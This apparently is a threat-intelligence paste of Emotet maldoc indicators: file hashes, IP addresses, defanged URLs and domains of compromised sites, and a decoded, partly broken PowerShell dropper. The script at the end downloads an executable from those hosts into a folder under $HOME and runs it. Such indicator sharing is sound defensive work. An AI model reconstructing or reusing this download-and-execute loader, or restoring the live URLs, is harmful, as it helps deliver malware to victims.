paladin316

Emotet_Doc_out_2020-10-30_13_43.txt

Oct 30th, 2020
  1. #Emotet #Docs #malware #OSINT #IOC
  2.  
  3. SHA256:
  4. 2efeab91d822ab76173df70e491b2cd6881d1435186ad6659da73c4e5c5214bf
  5. 2efeab91d822ab76173df70e491b2cd6881d1435186ad6659da73c4e5c5214bf
  6. 9c5b4f0d6c8c7b28d62d9b8ac13326bf4bb4bd938fea75a6ab10e0875b9b001b
  7. 9c5b4f0d6c8c7b28d62d9b8ac13326bf4bb4bd938fea75a6ab10e0875b9b001b
  8. d59b87dd3d075643377a93c2c9a0a308993c94b60fb201e1b825c2ede0441f1a
  9. 612b66140b3b1ee1d77949fe254bb8348132d29b07fcbf108dcf5b85e98575b4
  10. 9a4be820bf1a19b0f6e8e7be55bbd8ec017ff3125bd4ece187b347b1602a3ac8
  11. f2ce2b3d2bf2f5d0f22eabb44f0b7c9183e0fea547e90ab926beae89d85cdf0e
  12. 6270902fc810af901f9685bb0b3251f8cf96445514e9bd288b51d51156701665
  13. 1e363452c2a67d40f01390488a99f68ce6fab805b45eab93ee2db2469bf1b05f
  14. 2004d64ee603572e13a168eca558d2ade8169581208022e51896e0589e07116d
  15. 3e7cecd24a5a4f442e024c198f65a755fceb5eb0e72b385bb636695a37805c0b
  16. 3e7cecd24a5a4f442e024c198f65a755fceb5eb0e72b385bb636695a37805c0b
  17. f861bf87ae94a28905aac6e55eb8f701589a30bcb2b6d452b8be5ce93f324bf0
  18. f861bf87ae94a28905aac6e55eb8f701589a30bcb2b6d452b8be5ce93f324bf0
  19. 78bd1c6e03aab90ba0350183bb9aba52148938c5c4384fb2695473c6540e139a
  20. cc0614f4e21c1d63a80e1ddecfd591353e15aa849f754be9d8b709cc6e9841c9
  21. cc0614f4e21c1d63a80e1ddecfd591353e15aa849f754be9d8b709cc6e9841c9
  22. d577446435b94d0af2a829f1160b594e95c8051f6b069400ff61fa38d151ba54
  23. d577446435b94d0af2a829f1160b594e95c8051f6b069400ff61fa38d151ba54
  24. e37545649e9e7c9250af64a93a2fa3e37fd90ab7f9c16e96b4469290f309b52b
  25. e37545649e9e7c9250af64a93a2fa3e37fd90ab7f9c16e96b4469290f309b52b
  26. f2413a07e3362999d85fbab3f6c2fe8f228e4567eac899cd565ad65a2d0eede9
  27. f2413a07e3362999d85fbab3f6c2fe8f228e4567eac899cd565ad65a2d0eede9
  28. 56f61f11f75eabcc97d90aba385131e95efc547284902bf3e092349e7204858f
  29. 9a3cf0ee5d4dd3b313ee5bcd29a8d47438f7eef1880734caca989e6ffbe45092
  30. 61aa32a570716ce0d7c579186cd0cc291148bdeb623f0709c3a0b0b3f3d4d384
  31. 14a8572928770f8d61fa05890c3e0a5cd4396bfde2ce2763d533e89d05120d34
  32. 6a56325cee2a2a8f5e25ea794eac07e6822aafb9390f367bcc90bccc80090aa6
  33. a914d86d2a97040bb1c91827828f9ec8e72e18d73ca90d884b5d385e4c9793f5
  34. daeb92e05345d47a45c1b3280da742a4ebbfb30b3f4956e8f94b4dab762e91a7
  35. e054d39b0aac7c2b6c6b76bc40435c1d0ffca154764349deefbc46f9d6ba453b
  36. e054d39b0aac7c2b6c6b76bc40435c1d0ffca154764349deefbc46f9d6ba453b
  37. 11ca328f60c6058bf42835808a9fe2b714662abe61af21015943c7628157d393
  38. 11ca328f60c6058bf42835808a9fe2b714662abe61af21015943c7628157d393
  39. ffc63081ade619c07061526c15e53d5dd012da2e842f479fefc0c27f46ce2beb
  40. 41c1aacf38f4e4b127131377357db324852107ff972122bb57ec3ba8f894a7bd
  41. 8810a3bb22ea0fde029efa89b401cdf843e46d10ba1eeff3522cb526f29e8ba7
  42. 96636e8803958a85be6974b0fc6c91e24526ae529a00c31dcfdbf3ed761c5304
  43. df1390a8493f224502992c62d7e529f871c9e850b53e3479d9de2d1994f8f91e
  44. d7c0fc3658da4a6040cab7aff29764849e26c699642492446759314c94586b6d
  45. 72cbfce2d1bb68f6583a651975d64056490779254d19bbf18636a754d88688c3
  46. 289f8b4babc8f697bcbc3125ded9cfddefa96b986243538034beda8361d69a26
  47. b48b7231ac7d5bc0a2ba5883e7a634a557c606b06b97bf45b2842523959c4a37
  48. 682b88668279b5fb8415dfbe6b8a135dca290767dd5bed3fc6b45d230d3c3925
  49.  
  50.  
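  51. IPs (several of the 104.x and 172.67.x addresses appear to sit in shared CDN ranges, so correlate them with the domains and URLs below rather than alerting or blocking on the IP alone):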
  52. 103.82.52.25
  53. 104.18.62.171
  54. 104.18.63.171
  55. 104.24.98.175
  56. 104.24.99.175
  57. 104.27.132.14
  58. 104.27.133.14
  59. 104.28.22.149
  60. 104.28.23.149
  61. 104.28.24.139
  62. 104.28.25.139
  63. 104.28.6.70
  64. 104.28.7.70
  65. 104.31.68.179
  66. 104.31.69.179
  67. 112.74.91.108
  68. 120.77.243.218
  69. 123.59.232.99
  70. 137.118.60.3
  71. 148.72.93.189
  72. 156.247.12.150
  73. 172.67.132.92
  74. 172.67.133.164
  75. 172.67.178.62
  76. 172.67.180.161
  77. 172.67.180.46
  78. 172.67.191.219
  79. 172.67.220.107
  80. 176.65.242.190
  81. 192.151.155.100
  82. 202.66.172.245
  83. 209.103.180.4
  84. 35.208.159.220
  85. 35.213.176.43
  86. 35.214.134.107
  87. 35.214.15.47
  88. 45.119.83.207
  89. 47.106.177.2
  90. 67.227.236.124
  91. 79.172.193.70
  92. 85.14.243.50
  93. 96.17.68.91
  94.  
  95.  
  96.  
  97. URLs:
  98. hxxps://enjoymylifecheryl.com/wp-includes/FPNxoUiCz3/
  99. hxxps://homewatchamelia.com/wp-admin/qmK/
  100. hxxps://seramporemunicipality.org/replacement-vin/Ql4R/
  101. hxxps://imperfectdream.com/wp-content/xb2csjPW6/
  102. hxxps://mayxaycafe.net/wp-includes/UxdWFzYQj/
  103. hxxps://420extracts.ca/cgi-bin/Ecv/
  104. hxxps://casinopalacett.com/wp-admin/voZDArg/
  105.  
  106.  
  107. Domains:
  108. enjoymylifecheryl.com
  109. homewatchamelia.com
  110. seramporemunicipality.org
  111. imperfectdream.com
  112. mayxaycafe.net
  113. 420extracts.ca
  114. casinopalacett.com
  115.  
  116.  
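  117. Decoded Base64 PowerShell (URLs are defanged as hxxps, and quotes and parentheses appear to have been stripped during decoding, so the text is not runnable as shown). Behaviour visible below: creates a directory under $HOME, sets the security protocol to TLS 1.2, tries each URL in turn with Net.WebClient DownloadFile into an .exe in that directory, and starts the file through win32_Process Create only when its length is at least 44263 bytes: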
  118. <���^, $8P4vcu = [tyPe]"{5}{2}{0}{3}{1}{4}" -f M.i,O,yste,O.dIrect,Ry,S ;
  119. SeT LsV0 [tYpe]"{5}{0}{3}{1}{2}{4}{6}" -F.NE,V,IcEp,T.SeR,oInTmAnAG,sYSTeM,er ;
  120. $Rlrkjnw=Qr1ru9y;
  121. $D7qz32b=$Wa6rea4 [char]64 $Dehv673;
  122. $O5aqk3g=Xa7q3h0;
  123. dIr VARiAble:8P4Vcu.valuE::"cre`ATeD`IReCT`oRY"$HOME {0}Nscs8ry{0}S9t4g_l{0} -F [CHAr]92;
  124. $Ga8ff5s=Nffefbg;
  125. $lSv0::"sE`cU`Rit`yProToCOl" = Tls12;
  126. $Ru818ii=Vzvdenv;
  127. $G9po_gt = Epl6_wa2m;
  128. $Yfwba66=Thli7b3;
  129. $Irioufu=Y22l3ct;
  130. $Llo6n_w=$HOME{0}Nscs8ry{0}S9t4g_l{0} -F [ChAR]92$G9po_gt.exe;
  131. $Jvjds4y=G_wnx9u;
  132. $H5xr5lm=.new-object nEt.webcLIENt;
  133. $Mmo41vn=hxxps://enjoymylifecheryl.com/wp-includes/FPNxoUiCz3/
  134. hxxps://homewatchamelia.com/wp-admin/qmK/
  135. hxxps://seramporemunicipality.org/replacement-vin/Ql4R/
  136. hxxps://imperfectdream.com/wp-content/xb2csjPW6/
  137. hxxps://mayxaycafe.net/wp-includes/UxdWFzYQj/
  138. hxxps://420extracts.ca/cgi-bin/Ecv/
  139. hxxps://casinopalacett.com/wp-admin/voZDArg/."r`EP`Lace"/,[array]/,xwe[0]."sPl`It"$Chkut94 $D7qz32b $Opdketn;
  140. $Rf7k3zk=Usfuthv;
  141. foreach $Uhbkd7k in $Mmo41vn{try{$H5xr5lm."dO`wnl`Oa`DfIlE"$Uhbkd7k, $Llo6n_w;
  142. $Fsiu4_x=Urtdzox;
  143. If .Get-Item $Llo6n_w."Len`GTh" -ge 44263 {[wmiclass]win32_Process."Cre`A`Te"$Llo6n_w;
  144. $Yzrcjro=T2a4ijn;
  145. break;
  146. $Ccwk57z=Lslfh6p}}catch{}}$L9wtd00=Vxbiwxu
  147.  